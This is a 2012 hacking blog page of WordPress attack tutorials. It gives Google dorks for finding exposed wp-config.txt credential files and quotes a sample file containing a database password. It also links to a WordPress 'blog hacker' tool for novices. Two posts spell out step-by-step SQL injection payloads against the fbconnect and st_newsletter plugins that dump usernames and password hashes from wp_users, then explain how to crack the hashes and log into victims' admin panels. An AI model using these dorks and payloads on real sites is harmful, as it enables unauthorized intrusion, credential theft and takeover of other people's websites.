blogger

Showing posts with label WP-hack. Show all posts
Showing posts with label WP-hack. Show all posts

Friday, August 10, 2012

Get Wordpress MySQL Database by Google Dork

Get Wordpress MySQL Database by Google Dork

http://sysmox.com/blog/wp-content/uploads/2011/11/wordpress-attack.jpg
Get Wordpress MySQL Database by Google Dork 

its a bug in in some wodpress websites, it allow Hackers for Getting website's MYSQL database remotly,i Hope you must knows about MYSQL database in wordpress (wp-config.php file)

Dork : 
allinurl:wp-config.txt
so Google To Google.com and enther this Dork  allinurl:wp-config.txt 
and you'll Got MYSQL Databases
its look like 



<?php
// ** MySQL settings ** //
define('DB_NAME', 'dbpakde');    // The name of the database
define('DB_USER', 'pakde');     // Your MySQL username
define('DB_PASSWORD', 'tot111'); // ...and password
define('DB_HOST', 'localhost');    // 99% chance you won't need to change this value

Live Demo : http://pakde.com/wp-config.txt

Mr.Dark Soul's Wordpress Blog Hacker

Mr.Dark Soul's Wordpress Blog Hacker

Its a Wordpress hacking software named  Mr.Dark Soul Wordpress Blog Hacker.its a Special Soft For Newbie who wanna hack WP blog .Scrreenshot is enough for teaching that how to use Mr.Dark Soul Wordpress Blog Hacker


Click On Images For Larger Size or its Image Links 
http://i.imgur.com/BCXFD.gif
http://i.imgur.com/ywccU.gif
http://i.imgur.com/dhn43.gif
http://i.imgur.com/yJxc2.gif

[Image: BCXFD.gif]

[Image: ywccU.gif]

[Image: dhn43.gif]

[Image: yJxc2.gif]


Click : Download

Another Eeasy Method of wordpress Blog Hacking

Another Eeasy Method of wordpress Blog Hacking (Wordpress Easy Comment)

New Tut of Wordpress Blog Hacking,,, Lets Start ...
Open Google.com and enter This Dork
inurl:"fbconnect_action=myhome"
[Image: untitled24.JPG]
You will find many sites, Select the site which you are comfortable with.

[Image: untitled22.JPG]
The website Url will be Like this http://www.site.com/?fbconnect_action=myhome&userid=
Now replace the ?fbconnect_action=myhome&userid= with 
?fbconnect_action=myhome&amp;userid=
with this
?fbconnect_action=myhome&amp;fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ​ss)z0mbyak,7,8,9,10,11,12+from+wp_users-- 

Now The URL will be Like this ..
www.site.com/?fbconnect_action=myhome&amp;userid=
with this
www.site.com/?fbconnect_action=myhome&amp;fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ​ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
Now you have the User name and Password.

[Image: untitled23.JPG]
he password is encrypted with Wordpress md5 (blowfish). You need to decode this. Download And Run This Software to decode this type of password
Then find the administrator panel out. Normally it should be in
www.victrimsite.com/wp-admin

or
www.victrimsite.com/wp-login.php

[Image: untitled26.JPG]

Last Step : TYPE THE DECRYPTED USERNAME AND PASSWORD and Login In website :)

wordpress SQL Injection Hacks

wordpress SQL Injection Hacks


wordpress SQL Injection Hacks : Another Special Post :-) 

images (65×123)there are Million of  sites which hosted on wordpress. and i already posted Some Tutorials on wordpress Hacking You Can Check it here , so Its new Tutorial on wordpress 
hacking with SQL injections, lets see


Cilck here to heck List of wordpress SQL Injections

How To use it ? 
For Example 1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* Now Modify it into a Google Dork, For making Dork use "Inurl:injection's php or dire here" for example for this injection dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php" Now Go to Google.com and type your modified dork and see the serach result the search result will be like this for dork http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=        Reomve the words after iframe.php and put ur SQl injection here ... now the url will be http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--You will got the use name and md5 coded password ... Crash the password using md5 decoding Tools and login here http://site.com/wp-login.php 
Note : The Process is same for all Injections is same ... cooment below if any dobught ..

Like Us Anonops Anonimo


Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by http://www.thepiratesoft.org/ | Bloggerized by Lasantha - Premium Blogger Themes | Hack